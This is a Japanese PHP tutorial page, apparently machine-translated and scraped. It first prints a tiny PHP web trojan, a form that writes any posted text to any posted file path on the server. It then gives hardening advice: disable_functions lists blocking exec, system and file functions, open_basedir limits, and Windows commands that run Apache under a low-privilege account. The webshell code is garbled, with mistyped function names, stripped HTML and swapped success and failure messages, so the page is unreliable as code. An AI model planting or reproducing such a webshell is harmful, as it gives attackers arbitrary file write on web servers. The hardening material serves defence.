ホームページ  >  記事  >  バックエンド開発  >  世界最小の PHP Web トロイの木馬と PHP トロイの木馬の防止方法_PHP チュートリアル

世界最小の PHP Web トロイの木馬と PHP トロイの木馬の防止方法_PHP チュートリアル

WBOY
WBOYオリジナル
2016-07-21 15:44:00826ブラウズ

php web Trojan

コードをコピー コードは次のとおりです:

header("content-Type: text/html; charset=gb2312")
if(get_magic_quotes_gpc()); ($_POST as $k=>$v) $_POST[$k] =tripslashes($v);

保存ファイル名:


textarea name= "text" COLS="70" ROWS="18" >





if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite ($fp,$_POST['text']) ? '保存に失敗しました!'
@fclose($fp)
?>


コードをコピーします
コードは次のとおりです:


PHP トロイの木馬を防ぐ方法
PHP は、動的な Web ページを生成できるツールの 1 つです。 PHP Web ファイルは通常の HTML Web ファイルとして扱われ、編集する場合は、HTML を編集するのと同じ方法で PHP を作成できます。
PHP はハイパーテキスト プリプロセッサ (PHP: Hypertext Preprocessor) の略で、PHP 公式サイト (http://www.php.net) から無料でダウンロードできます。 PHP は GNU Public License (GPL) に準拠しており、これに基づいて Linux や Emacs などの多くの人気ソフトウェアが誕生しました。 PHP は、ほとんどの Unix プラットフォーム、GUN/Linux、および Microsoft Windows プラットフォームで実行できます。 Windows PC または Unix マシンに PHP をインストールする方法については、PHP 公式サイトを参照してください。インストールプロセスは簡単です。 PHP のもう 1 つの利点は、そのセキュリティです。PHP の誕生により、ASP とは異なり、セキュリティの設定が非常に簡単になるため、ネットワーク セキュリティがますます注目されるようになりました。多くの手順を実行し、多くのサービスを無効にします。ただし、どんなに優れたものであっても、PHP がデフォルトで設定されている場合、脆弱性が常に存在します。そのため、この記事では、スクリプト トロイの木馬の破壊を防ぐために PHP のセキュリティ面を設定する方法について説明します。
1. PHP トロイの木馬が WebShell を実行しないようにします。
safe_mode を開き、php.ini で disable_functions= passthru、exec、shell_exec、system を設定します。いずれかまたは両方を選択できます。
2. Web ディレクトリからの飛び出しを防ぐ
まず httpd.conf を変更します。php スクリプト プログラムを Web ディレクトリ内でのみ動作させる場合は、httpd.conf ファイルを変更して php の動作パスを制限することもできます。たとえば、Web ディレクトリが /usr/local/apache/htdocs の場合、スクリプトが /usr/local/apache/ を読み取る必要がある場合は、次の行を httpd.conf に追加します: php_admin_value open_basedir /usr/local/apache/htdocs htdocs 以外のファイルは許可されません。エラー メッセージが表示されると、次のようなエラーが表示されます。警告: ファイルが /usr/local/apache/htdocs/open.php の間違ったディレクトリにあります。 4行目など。
3. PHP トロイの木馬によるファイル ディレクトリの読み書きを防止します
php.ini では、disable_functions= passthru、exec、shell_exec、system の後に、主に fopen、mkdir、rmdir、chmod、unlink、dir、fopen などの PHP ファイル処理関数が続きます。 fread、fclose、fwrite、file_exists、closedir、is_dir、readdir.opendir、fileperms.copy、unlink、delfile。これは、disable_functions= passthru、exec、shell_exec、system、fopen、mkdir、rmdir、chmod、unlink、dir、fopen、fread、fclose、fwrite、file_exists、closedir、is_dir、readdir.opendir、fileperms.copy、unlink、delfile になります。
OK、完了しました。PHP トロイの木馬は私たちとは何の関係もありません。残念ながら、この場合、テキスト データベースを使用するものは機能しなくなります。 Apache が Windos プラットフォーム上に構築されている場合は、それに注意する必要があります。デフォルトでは、Apache へのアクセス許可を次のように減らす必要があります:
net user apache f**kmicrosoft /add
net localgroup users apache /del
この時点では、どのグループにも属さないユーザー apche を作成します。コンピューターマネージャー-サービス-Apache サービスのプロパティ-ログオン-このアカウントを開き、ここで上記で作成したアカウントとパスワードを入力して再起動します。 Apache サービスは、低い権限での Apache 操作を実現します。
要約: 実際、各フォルダーのアクセス許可を設定し、ディレクトリごとに読み取りと書き込みができる個別のユーザーを作成することによってもセキュリティを実現できます。現在、多くの Web ホスティング プロバイダーで一般的な構成方法ですが、この方法はこれを防ぐには過剰です。管理者がセキュリティ意識を持っている限り、未使用の機能を相対的にブロックすることで、ネットワーク セキュリティの脅威を防ぐことができます。

以下は、一部の Web トロイの木馬によるファイルの生成などを防ぐための mcafee のセキュリティ設定です。
http://www.jb51.net/hack/list461_1.html

http://www.bkjia.com/PHPjc/320608.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/320608.html技術記事 php web トロイの木馬のコピー コードは次のとおりです: ?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=$v) $_POST[$ k] = ストリップスラッシュ($v);...
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。